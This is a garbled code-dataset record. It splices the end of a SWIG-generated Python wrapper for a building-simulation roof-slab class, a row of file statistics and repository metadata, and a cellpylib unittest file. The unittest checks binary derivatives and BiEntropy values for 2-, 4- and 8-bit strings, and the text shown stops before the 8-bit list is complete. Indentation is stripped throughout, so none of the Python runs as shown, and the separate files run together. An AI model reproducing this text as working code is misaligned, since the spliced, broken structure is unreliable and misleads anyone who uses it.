__repr__ = _swig_repr
def SimSlab_SurfType(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_SurfType(self, *args)
def SimSlab_Vertex_1_120_X_Coord(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_Vertex_1_120_X_Coord(self, *args)
def SimSlab_Vertex_1_120_Y_Coord(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_Vertex_1_120_Y_Coord(self, *args)
def SimSlab_Vertex_1_120_Z_Coord(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_Vertex_1_120_Z_Coord(self, *args)
def SimSlab_AzimuthAng(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_AzimuthAng(self, *args)
def SimSlab_TiltAng(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_TiltAng(self, *args)
def SimSlab_StartXCoord(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_StartXCoord(self, *args)
def SimSlab_StartYCoord(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_StartYCoord(self, *args)
def SimSlab_StartZCoord(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_StartZCoord(self, *args)
def SimSlab_Length(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_Length(self, *args)
def SimSlab_Width(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_Width(self, *args)
def T24CRRCAgedEmittance(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24CRRCAgedEmittance(self, *args)
def T24CRRCAgedReflectance(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24CRRCAgedReflectance(self, *args)
def T24CRRCAgedSRI(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24CRRCAgedSRI(self, *args)
def T24CRRCInitialEmittance(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24CRRCInitialEmittance(self, *args)
def T24CRRCInitialReflectance(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24CRRCInitialReflectance(self, *args)
def T24CRRCInitialSRI(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24CRRCInitialSRI(self, *args)
def T24CRRCProductID(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24CRRCProductID(self, *args)
def T24FieldAppliedCoating(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24FieldAppliedCoating(self, *args)
def T24ConstructStatus3(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24ConstructStatus3(self, *args)
def __init__(self, *args):
this = _SimSlab_RoofSlab_RoofUnderAir.new_SimSlab_RoofSlab_RoofUnderAir(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir__clone(self, f, c)
__swig_destroy__ = _SimSlab_RoofSlab_RoofUnderAir.delete_SimSlab_RoofSlab_RoofUnderAir
__del__ = lambda self: None
SimSlab_RoofSlab_RoofUnderAir_swigregister = _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_swigregister
SimSlab_RoofSlab_RoofUnderAir_swigregister(SimSlab_RoofSlab_RoofUnderAir)
class SimSlab_RoofSlab_RoofUnderAir_sequence(base.sequence_common):
__swig_setmethods__ = {}
for _s in [base.sequence_common]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimSlab_RoofSlab_RoofUnderAir_sequence, name, value)
__swig_getmethods__ = {}
for _s in [base.sequence_common]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimSlab_RoofSlab_RoofUnderAir_sequence, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _SimSlab_RoofSlab_RoofUnderAir.new_SimSlab_RoofSlab_RoofUnderAir_sequence(*args)
try:
self.this.append(this)
except:
self.this = this
def assign(self, n, x):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_assign(self, n, x)
def begin(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_begin(self, *args)
def end(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_end(self, *args)
def rbegin(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_rbegin(self, *args)
def rend(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_rend(self, *args)
def at(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_at(self, *args)
def front(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_front(self, *args)
def back(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_back(self, *args)
def push_back(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_push_back(self, *args)
def pop_back(self):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_pop_back(self)
def detach_back(self, pop=True):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_detach_back(self, pop)
def insert(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_insert(self, *args)
def erase(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_erase(self, *args)
def detach(self, position, r, erase=True):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_detach(self, position, r, erase)
def swap(self, x):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_swap(self, x)
__swig_destroy__ = _SimSlab_RoofSlab_RoofUnderAir.delete_SimSlab_RoofSlab_RoofUnderAir_sequence
__del__ = lambda self: None
SimSlab_RoofSlab_RoofUnderAir_sequence_swigregister = _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_swigregister
SimSlab_RoofSlab_RoofUnderAir_sequence_swigregister(SimSlab_RoofSlab_RoofUnderAir_sequence)
# This file is compatible with both classic and new-style classes.
| 41.913386 | 136 | 0.763792 | 1,763 | 15,969 | 6.396483 | 0.112876 | 0.246076 | 0.332801 | 0.256274 | 0.674293 | 0.651946 | 0.621974 | 0.58872 | 0.442671 | 0.293074 | 0 | 0.005823 | 0.161187 | 15,969 | 380 | 137 | 42.023684 | 0.836058 | 0.018411 | 0 | 0.234657 | 1 | 0 | 0.016342 | 0.00383 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285199 | false | 0.00722 | 0.043321 | 0.259928 | 0.711191 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
9a6b8b686edca877cca8d5658613bbb9cff21e47 | 42,879 | py | Python | tests/test_bien.py | swifmaneum/cellpylib | 4f7be652f2bb49b58ea482b2929617d813111f77 | [
"Apache-2.0"
] | 124 | 2018-03-24T16:36:45.000Z | 2022-03-22T08:47:46.000Z | tests/test_bien.py | swifmaneum/cellpylib | 4f7be652f2bb49b58ea482b2929617d813111f77 | [
"Apache-2.0"
] | 24 | 2019-03-04T23:15:56.000Z | 2021-12-28T18:43:05.000Z | tests/test_bien.py | swifmaneum/cellpylib | 4f7be652f2bb49b58ea482b2929617d813111f77 | [
"Apache-2.0"
] | 21 | 2019-01-29T13:53:48.000Z | 2021-11-16T04:31:58.000Z | import unittest
import cellpylib as cpl
class TestBiEntropy(unittest.TestCase):
def test_binary_derivative(self):
self.assertEqual(cpl.binary_derivative('01010101'), '1111111')
self.assertEqual(cpl.binary_derivative('1111111'), '000000')
self.assertEqual(cpl.binary_derivative('000000'), '00000')
self.assertEqual(cpl.binary_derivative('00000'), '0000')
self.assertEqual(cpl.binary_derivative('0000'), '000')
self.assertEqual(cpl.binary_derivative('000'), '00')
self.assertEqual(cpl.binary_derivative('00'), '0')
self.assertEqual(cpl.binary_derivative('0'), '')
self.assertEqual(cpl.binary_derivative('00010001'), '0011001')
self.assertEqual(cpl.binary_derivative('0011001'), '010101')
self.assertEqual(cpl.binary_derivative('010101'), '11111')
self.assertEqual(cpl.binary_derivative('11111'), '0000')
self.assertEqual(cpl.binary_derivative('00011111'), '0010000')
self.assertEqual(cpl.binary_derivative('0010000'), '011000')
self.assertEqual(cpl.binary_derivative('011000'), '10100')
self.assertEqual(cpl.binary_derivative('10100'), '1110')
self.assertEqual(cpl.binary_derivative('1110'), '001')
self.assertEqual(cpl.binary_derivative('001'), '01')
self.assertEqual(cpl.binary_derivative('01'), '1')
self.assertEqual(cpl.binary_derivative('1'), '')
def test_bien(self):
    """Check cpl.bien against precomputed BiEntropy values for every
    2-bit, 4-bit, and 8-bit binary string.

    The expected values show that bien is invariant under bit complement
    and under string reversal (e.g. '0001', '0010', '0100', '0111',
    '1000', '1011', '1101' and '1110' all map to the same value), and
    that the all-zeros and all-ones strings score exactly 0.0.
    """
    # 2-bit strings: exact values, so assertEqual is used
    self.assertEqual(cpl.bien('00'), 0.0)
    self.assertEqual(cpl.bien('01'), 1.0)
    self.assertEqual(cpl.bien('10'), 1.0)
    self.assertEqual(cpl.bien('11'), 0.0)
    # 4-bit strings, asserts equality to 7 decimal places
    self.assertAlmostEqual(cpl.bien('0000'), 0.0)
    self.assertAlmostEqual(cpl.bien('0001'), 0.9496956846525874)
    self.assertAlmostEqual(cpl.bien('0010'), 0.9496956846525874)
    self.assertAlmostEqual(cpl.bien('0011'), 0.40522738115842555)
    self.assertAlmostEqual(cpl.bien('0100'), 0.9496956846525874)
    self.assertAlmostEqual(cpl.bien('0101'), 0.14285714285714285)
    self.assertAlmostEqual(cpl.bien('0110'), 0.40522738115842555)
    self.assertAlmostEqual(cpl.bien('0111'), 0.9496956846525874)
    self.assertAlmostEqual(cpl.bien('1000'), 0.9496956846525874)
    self.assertAlmostEqual(cpl.bien('1001'), 0.40522738115842555)
    self.assertAlmostEqual(cpl.bien('1010'), 0.14285714285714285)
    self.assertAlmostEqual(cpl.bien('1011'), 0.9496956846525874)
    self.assertAlmostEqual(cpl.bien('1100'), 0.40522738115842555)
    self.assertAlmostEqual(cpl.bien('1101'), 0.9496956846525874)
    self.assertAlmostEqual(cpl.bien('1110'), 0.9496956846525874)
    self.assertAlmostEqual(cpl.bien('1111'), 0.0)
    # 8-bit strings, asserts equality to 7 decimal places
    self.assertAlmostEqual(cpl.bien('00000000'), 0.0)
    self.assertAlmostEqual(cpl.bien('00000001'), 0.9170735521822547)
    self.assertAlmostEqual(cpl.bien('00000010'), 0.9370347771941213)
    self.assertAlmostEqual(cpl.bien('00000011'), 0.44747006666680555)
    self.assertAlmostEqual(cpl.bien('00000100'), 0.9454843334903775)
    self.assertAlmostEqual(cpl.bien('00000101'), 0.22952306172250708)
    self.assertAlmostEqual(cpl.bien('00000110'), 0.454318194570354)
    self.assertAlmostEqual(cpl.bien('00000111'), 0.9444447585278324)
    self.assertAlmostEqual(cpl.bien('00001000'), 0.9297978768247205)
    self.assertAlmostEqual(cpl.bien('00001001'), 0.4719276050543988)
    self.assertAlmostEqual(cpl.bien('00001010'), 0.22952306172250708)
    self.assertAlmostEqual(cpl.bien('00001011'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('00001100'), 0.45174483501301504)
    self.assertAlmostEqual(cpl.bien('00001101'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('00001110'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('00001111'), 0.10727664290566898)
    self.assertAlmostEqual(cpl.bien('00010000'), 0.9297978768247205)
    self.assertAlmostEqual(cpl.bien('00010001'), 0.053399483437225476)
    self.assertAlmostEqual(cpl.bien('00010010'), 0.4562411483887417)
    self.assertAlmostEqual(cpl.bien('00010011'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('00010100'), 0.23797261801876332)
    self.assertAlmostEqual(cpl.bien('00010101'), 0.9402699705777856)
    self.assertAlmostEqual(cpl.bien('00010110'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('00010111'), 0.45515378785140964)
    self.assertAlmostEqual(cpl.bien('00011000'), 0.46743129167867215)
    self.assertAlmostEqual(cpl.bien('00011001'), 0.9265064677305163)
    self.assertAlmostEqual(cpl.bien('00011010'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('00011011'), 0.23945861703877014)
    self.assertAlmostEqual(cpl.bien('00011100'), 0.9487195268740418)
    self.assertAlmostEqual(cpl.bien('00011101'), 0.45772714740874854)
    self.assertAlmostEqual(cpl.bien('00011110'), 0.1141247708092174)
    self.assertAlmostEqual(cpl.bien('00011111'), 0.9444447585278324)
    self.assertAlmostEqual(cpl.bien('00100000'), 0.9454843334903775)
    self.assertAlmostEqual(cpl.bien('00100001'), 0.4562411483887417)
    self.assertAlmostEqual(cpl.bien('00100010'), 0.053399483437225476)
    self.assertAlmostEqual(cpl.bien('00100011'), 0.9349560240267725)
    self.assertAlmostEqual(cpl.bien('00100100'), 0.4536677888314028)
    self.assertAlmostEqual(cpl.bien('00100101'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('00100110'), 0.9421929243961734)
    self.assertAlmostEqual(cpl.bien('00100111'), 0.23945861703877014)
    self.assertAlmostEqual(cpl.bien('00101000'), 0.23797261801876332)
    self.assertAlmostEqual(cpl.bien('00101001'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('00101010'), 0.920308745565919)
    self.assertAlmostEqual(cpl.bien('00101011'), 0.468917290698679)
    self.assertAlmostEqual(cpl.bien('00101100'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('00101101'), 0.1141247708092174)
    self.assertAlmostEqual(cpl.bien('00101110'), 0.45772714740874854)
    self.assertAlmostEqual(cpl.bien('00101111'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('00110000'), 0.45174483501301504)
    self.assertAlmostEqual(cpl.bien('00110001'), 0.9421929243961734)
    self.assertAlmostEqual(cpl.bien('00110010'), 0.9265064677305163)
    self.assertAlmostEqual(cpl.bien('00110011'), 0.023389419465106323)
    self.assertAlmostEqual(cpl.bien('00110100'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('00110101'), 0.4558041935903608)
    self.assertAlmostEqual(cpl.bien('00110110'), 0.2310090607425139)
    self.assertAlmostEqual(cpl.bien('00110111'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('00111000'), 0.9487195268740418)
    self.assertAlmostEqual(cpl.bien('00111001'), 0.2310090607425139)
    self.assertAlmostEqual(cpl.bien('00111010'), 0.47341360407440564)
    self.assertAlmostEqual(cpl.bien('00111011'), 0.9349560240267725)
    self.assertAlmostEqual(cpl.bien('00111100'), 0.1115514112518785)
    self.assertAlmostEqual(cpl.bien('00111101'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('00111110'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('00111111'), 0.44747006666680555)
    self.assertAlmostEqual(cpl.bien('01000000'), 0.9370347771941213)
    self.assertAlmostEqual(cpl.bien('01000001'), 0.23797261801876332)
    self.assertAlmostEqual(cpl.bien('01000010'), 0.4536677888314028)
    self.assertAlmostEqual(cpl.bien('01000011'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('01000100'), 0.053399483437225476)
    self.assertAlmostEqual(cpl.bien('01000101'), 0.9330330702083848)
    self.assertAlmostEqual(cpl.bien('01000110'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('01000111'), 0.45772714740874854)
    self.assertAlmostEqual(cpl.bien('01001000'), 0.4562411483887417)
    self.assertAlmostEqual(cpl.bien('01001001'), 0.9487195268740418)
    self.assertAlmostEqual(cpl.bien('01001010'), 0.9444447585278324)
    self.assertAlmostEqual(cpl.bien('01001011'), 0.1141247708092174)
    self.assertAlmostEqual(cpl.bien('01001100'), 0.9265064677305163)
    self.assertAlmostEqual(cpl.bien('01001101'), 0.468917290698679)
    self.assertAlmostEqual(cpl.bien('01001110'), 0.23945861703877014)
    self.assertAlmostEqual(cpl.bien('01001111'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('01010000'), 0.22952306172250708)
    self.assertAlmostEqual(cpl.bien('01010001'), 0.9487195268740418)
    self.assertAlmostEqual(cpl.bien('01010010'), 0.9444447585278324)
    self.assertAlmostEqual(cpl.bien('01010011'), 0.4558041935903608)
    self.assertAlmostEqual(cpl.bien('01010100'), 0.920308745565919)
    self.assertAlmostEqual(cpl.bien('01010101'), 0.007874015748031496)
    self.assertAlmostEqual(cpl.bien('01010110'), 0.4489560656868124)
    self.assertAlmostEqual(cpl.bien('01010111'), 0.9402699705777856)
    self.assertAlmostEqual(cpl.bien('01011000'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('01011001'), 0.4532308340330219)
    self.assertAlmostEqual(cpl.bien('01011010'), 0.10727664290566899)
    self.assertAlmostEqual(cpl.bien('01011011'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('01011100'), 0.47341360407440564)
    self.assertAlmostEqual(cpl.bien('01011101'), 0.9330330702083848)
    self.assertAlmostEqual(cpl.bien('01011110'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('01011111'), 0.22952306172250708)
    self.assertAlmostEqual(cpl.bien('01100000'), 0.454318194570354)
    self.assertAlmostEqual(cpl.bien('01100001'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('01100010'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('01100011'), 0.2310090607425139)
    self.assertAlmostEqual(cpl.bien('01100100'), 0.9421929243961734)
    self.assertAlmostEqual(cpl.bien('01100101'), 0.4532308340330219)
    self.assertAlmostEqual(cpl.bien('01100110'), 0.023389419465106323)
    self.assertAlmostEqual(cpl.bien('01100111'), 0.9265064677305163)
    self.assertAlmostEqual(cpl.bien('01101000'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('01101001'), 0.1115514112518785)
    self.assertAlmostEqual(cpl.bien('01101010'), 0.4489560656868124)
    self.assertAlmostEqual(cpl.bien('01101011'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('01101100'), 0.2310090607425139)
    self.assertAlmostEqual(cpl.bien('01101101'), 0.9487195268740418)
    self.assertAlmostEqual(cpl.bien('01101110'), 0.9349560240267725)
    self.assertAlmostEqual(cpl.bien('01101111'), 0.4719276050543988)
    self.assertAlmostEqual(cpl.bien('01110000'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('01110001'), 0.45515378785140964)
    self.assertAlmostEqual(cpl.bien('01110010'), 0.23945861703877014)
    self.assertAlmostEqual(cpl.bien('01110011'), 0.9421929243961734)
    self.assertAlmostEqual(cpl.bien('01110100'), 0.45772714740874854)
    self.assertAlmostEqual(cpl.bien('01110101'), 0.9487195268740418)
    self.assertAlmostEqual(cpl.bien('01110110'), 0.9349560240267725)
    self.assertAlmostEqual(cpl.bien('01110111'), 0.053399483437225476)
    self.assertAlmostEqual(cpl.bien('01111000'), 0.1141247708092174)
    self.assertAlmostEqual(cpl.bien('01111001'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('01111010'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('01111011'), 0.4562411483887417)
    self.assertAlmostEqual(cpl.bien('01111100'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('01111101'), 0.23797261801876332)
    self.assertAlmostEqual(cpl.bien('01111110'), 0.46743129167867215)
    self.assertAlmostEqual(cpl.bien('01111111'), 0.9170735521822547)
    self.assertAlmostEqual(cpl.bien('10000000'), 0.9170735521822547)
    self.assertAlmostEqual(cpl.bien('10000001'), 0.46743129167867215)
    self.assertAlmostEqual(cpl.bien('10000010'), 0.23797261801876332)
    self.assertAlmostEqual(cpl.bien('10000011'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('10000100'), 0.4562411483887417)
    self.assertAlmostEqual(cpl.bien('10000101'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('10000110'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('10000111'), 0.1141247708092174)
    self.assertAlmostEqual(cpl.bien('10001000'), 0.053399483437225476)
    self.assertAlmostEqual(cpl.bien('10001001'), 0.9349560240267725)
    self.assertAlmostEqual(cpl.bien('10001010'), 0.9487195268740418)
    self.assertAlmostEqual(cpl.bien('10001011'), 0.45772714740874854)
    self.assertAlmostEqual(cpl.bien('10001100'), 0.9421929243961734)
    self.assertAlmostEqual(cpl.bien('10001101'), 0.23945861703877014)
    self.assertAlmostEqual(cpl.bien('10001110'), 0.45515378785140964)
    self.assertAlmostEqual(cpl.bien('10001111'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('10010000'), 0.4719276050543988)
    self.assertAlmostEqual(cpl.bien('10010001'), 0.9349560240267725)
    self.assertAlmostEqual(cpl.bien('10010010'), 0.9487195268740418)
    self.assertAlmostEqual(cpl.bien('10010011'), 0.2310090607425139)
    self.assertAlmostEqual(cpl.bien('10010100'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('10010101'), 0.4489560656868124)
    self.assertAlmostEqual(cpl.bien('10010110'), 0.1115514112518785)
    self.assertAlmostEqual(cpl.bien('10010111'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('10011000'), 0.9265064677305163)
    self.assertAlmostEqual(cpl.bien('10011001'), 0.023389419465106323)
    self.assertAlmostEqual(cpl.bien('10011010'), 0.4532308340330219)
    self.assertAlmostEqual(cpl.bien('10011011'), 0.9421929243961734)
    self.assertAlmostEqual(cpl.bien('10011100'), 0.2310090607425139)
    self.assertAlmostEqual(cpl.bien('10011101'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('10011110'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('10011111'), 0.454318194570354)
    self.assertAlmostEqual(cpl.bien('10100000'), 0.22952306172250708)
    self.assertAlmostEqual(cpl.bien('10100001'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('10100010'), 0.9330330702083848)
    self.assertAlmostEqual(cpl.bien('10100011'), 0.47341360407440564)
    self.assertAlmostEqual(cpl.bien('10100100'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('10100101'), 0.10727664290566899)
    self.assertAlmostEqual(cpl.bien('10100110'), 0.4532308340330219)
    self.assertAlmostEqual(cpl.bien('10100111'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('10101000'), 0.9402699705777856)
    self.assertAlmostEqual(cpl.bien('10101001'), 0.4489560656868124)
    self.assertAlmostEqual(cpl.bien('10101010'), 0.007874015748031496)
    self.assertAlmostEqual(cpl.bien('10101011'), 0.920308745565919)
    self.assertAlmostEqual(cpl.bien('10101100'), 0.4558041935903608)
    self.assertAlmostEqual(cpl.bien('10101101'), 0.9444447585278324)
    self.assertAlmostEqual(cpl.bien('10101110'), 0.9487195268740418)
    self.assertAlmostEqual(cpl.bien('10101111'), 0.22952306172250708)
    self.assertAlmostEqual(cpl.bien('10110000'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('10110001'), 0.23945861703877014)
    self.assertAlmostEqual(cpl.bien('10110010'), 0.468917290698679)
    self.assertAlmostEqual(cpl.bien('10110011'), 0.9265064677305163)
    self.assertAlmostEqual(cpl.bien('10110100'), 0.1141247708092174)
    self.assertAlmostEqual(cpl.bien('10110101'), 0.9444447585278324)
    self.assertAlmostEqual(cpl.bien('10110110'), 0.9487195268740418)
    self.assertAlmostEqual(cpl.bien('10110111'), 0.4562411483887417)
    self.assertAlmostEqual(cpl.bien('10111000'), 0.45772714740874854)
    self.assertAlmostEqual(cpl.bien('10111001'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('10111010'), 0.9330330702083848)
    self.assertAlmostEqual(cpl.bien('10111011'), 0.053399483437225476)
    self.assertAlmostEqual(cpl.bien('10111100'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('10111101'), 0.4536677888314028)
    self.assertAlmostEqual(cpl.bien('10111110'), 0.23797261801876332)
    self.assertAlmostEqual(cpl.bien('10111111'), 0.9370347771941213)
    self.assertAlmostEqual(cpl.bien('11000000'), 0.44747006666680555)
    self.assertAlmostEqual(cpl.bien('11000001'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('11000010'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('11000011'), 0.1115514112518785)
    self.assertAlmostEqual(cpl.bien('11000100'), 0.9349560240267725)
    self.assertAlmostEqual(cpl.bien('11000101'), 0.47341360407440564)
    self.assertAlmostEqual(cpl.bien('11000110'), 0.2310090607425139)
    self.assertAlmostEqual(cpl.bien('11000111'), 0.9487195268740418)
    self.assertAlmostEqual(cpl.bien('11001000'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('11001001'), 0.2310090607425139)
    self.assertAlmostEqual(cpl.bien('11001010'), 0.4558041935903608)
    self.assertAlmostEqual(cpl.bien('11001011'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('11001100'), 0.023389419465106323)
    self.assertAlmostEqual(cpl.bien('11001101'), 0.9265064677305163)
    self.assertAlmostEqual(cpl.bien('11001110'), 0.9421929243961734)
    self.assertAlmostEqual(cpl.bien('11001111'), 0.45174483501301504)
    self.assertAlmostEqual(cpl.bien('11010000'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('11010001'), 0.45772714740874854)
    self.assertAlmostEqual(cpl.bien('11010010'), 0.1141247708092174)
    self.assertAlmostEqual(cpl.bien('11010011'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('11010100'), 0.468917290698679)
    self.assertAlmostEqual(cpl.bien('11010101'), 0.920308745565919)
    self.assertAlmostEqual(cpl.bien('11010110'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('11010111'), 0.23797261801876332)
    self.assertAlmostEqual(cpl.bien('11011000'), 0.23945861703877014)
    self.assertAlmostEqual(cpl.bien('11011001'), 0.9421929243961734)
    self.assertAlmostEqual(cpl.bien('11011010'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('11011011'), 0.4536677888314028)
    self.assertAlmostEqual(cpl.bien('11011100'), 0.9349560240267725)
    self.assertAlmostEqual(cpl.bien('11011101'), 0.053399483437225476)
    self.assertAlmostEqual(cpl.bien('11011110'), 0.4562411483887417)
    self.assertAlmostEqual(cpl.bien('11011111'), 0.9454843334903775)
    self.assertAlmostEqual(cpl.bien('11100000'), 0.9444447585278324)
    self.assertAlmostEqual(cpl.bien('11100001'), 0.1141247708092174)
    self.assertAlmostEqual(cpl.bien('11100010'), 0.45772714740874854)
    self.assertAlmostEqual(cpl.bien('11100011'), 0.9487195268740418)
    self.assertAlmostEqual(cpl.bien('11100100'), 0.23945861703877014)
    self.assertAlmostEqual(cpl.bien('11100101'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('11100110'), 0.9265064677305163)
    self.assertAlmostEqual(cpl.bien('11100111'), 0.46743129167867215)
    self.assertAlmostEqual(cpl.bien('11101000'), 0.45515378785140964)
    self.assertAlmostEqual(cpl.bien('11101001'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('11101010'), 0.9402699705777856)
    self.assertAlmostEqual(cpl.bien('11101011'), 0.23797261801876332)
    self.assertAlmostEqual(cpl.bien('11101100'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('11101101'), 0.4562411483887417)
    self.assertAlmostEqual(cpl.bien('11101110'), 0.053399483437225476)
    self.assertAlmostEqual(cpl.bien('11101111'), 0.9297978768247205)
    self.assertAlmostEqual(cpl.bien('11110000'), 0.10727664290566898)
    self.assertAlmostEqual(cpl.bien('11110001'), 0.9512928864313808)
    self.assertAlmostEqual(cpl.bien('11110010'), 0.9532158402497685)
    self.assertAlmostEqual(cpl.bien('11110011'), 0.45174483501301504)
    self.assertAlmostEqual(cpl.bien('11110100'), 0.9506424806924296)
    self.assertAlmostEqual(cpl.bien('11110101'), 0.22952306172250708)
    self.assertAlmostEqual(cpl.bien('11110110'), 0.4719276050543988)
    self.assertAlmostEqual(cpl.bien('11110111'), 0.9297978768247205)
    self.assertAlmostEqual(cpl.bien('11111000'), 0.9444447585278324)
    self.assertAlmostEqual(cpl.bien('11111001'), 0.454318194570354)
